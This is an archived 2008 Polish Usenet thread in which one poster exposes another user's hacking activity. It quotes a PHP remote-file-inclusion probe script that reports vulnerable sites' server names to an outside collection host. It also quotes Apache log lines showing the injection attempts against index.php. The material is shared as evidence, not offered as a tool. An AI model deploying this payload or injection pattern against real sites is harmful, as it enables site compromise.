Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

w sprawie usera ZaBeaTy

1 view
Skip to first unread message

Lemat

unread,
Jul 8, 2008, 5:38:12 AM7/8/08
to
heja,

Jestem właśnie po lekturze:
http://zetbete.bblog.pl/wpis,zrobiono;ze;mnie;hackera,8275.html
http://zetbete.bblog.pl/wpis,spowrotem;na;laczach,10858.html

Pozwolę sobie zatem dorzucić ku potomności 3 grosze w postaci skryptu typu
PHP injection: http://webp.szu.pl/tc.txt

<?php
file('http://www.zbt.mtvk.pl/hk/save.php?rfi=' .
base64_encode($_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']));
echo base64_decode('PFJlbW90ZUZpbGVJbmNsdXNpb24+');
?>

oraz logów apacza:

210.245.120.9 - - [05/Jul/2008:16:20:03
+0200] "GET /index.php?m=opl&amp;pg_id=105' HTTP/1.0" 403
1050 "-" "-" "-" "-" "-"
210.245.120.9 - - [06/Jul/2008:18:14:07
+0200] "GET /index.php?m=page&pg_id=93' HTTP/1.0" 403
1050 "-" "-" "-" "-" "-"
210.245.120.9 - - [06/Jul/2008:23:15:38
+0200] "GET /index.php?m=http://www.webp.szu.pl/tc.txt?&amp;pg_id=15
HTTP/1.0" 403 1050 "-" "-" "-" "-" "-"
210.245.120.9 - - [06/Jul/2008:23:15:39
+0200] "GET /index.php?m=page&amp;pg_id=http://www.webp.szu.pl/tc.txt?
HTTP/1.0" 403 1050 "-" "-" "-" "-" "-"

Wynika stąd dość jednoznacznie, że dla użytkownik ZaBeaTy pierwszą rzeczą
jaką zrobił po odzyskaniu dostępu do klawiatury było odpalenie skryptu
poszukującego serwisów podatnych na RFI.

--
Pozdrawiam
Lemat


Adrian Brzeziński

unread,
Jul 24, 2008, 6:09:35 AM7/24/08
to
Lemat pisze:

> Wynika stąd dość jednoznacznie, że dla użytkownik ZaBeaTy pierwszą rzeczą
> jaką zrobił po odzyskaniu dostępu do klawiatury było odpalenie skryptu
> poszukującego serwisów podatnych na RFI.
>

Reklamowanie tego lamusa tez chyba nie jest dobrym pomysłem :p


0 new messages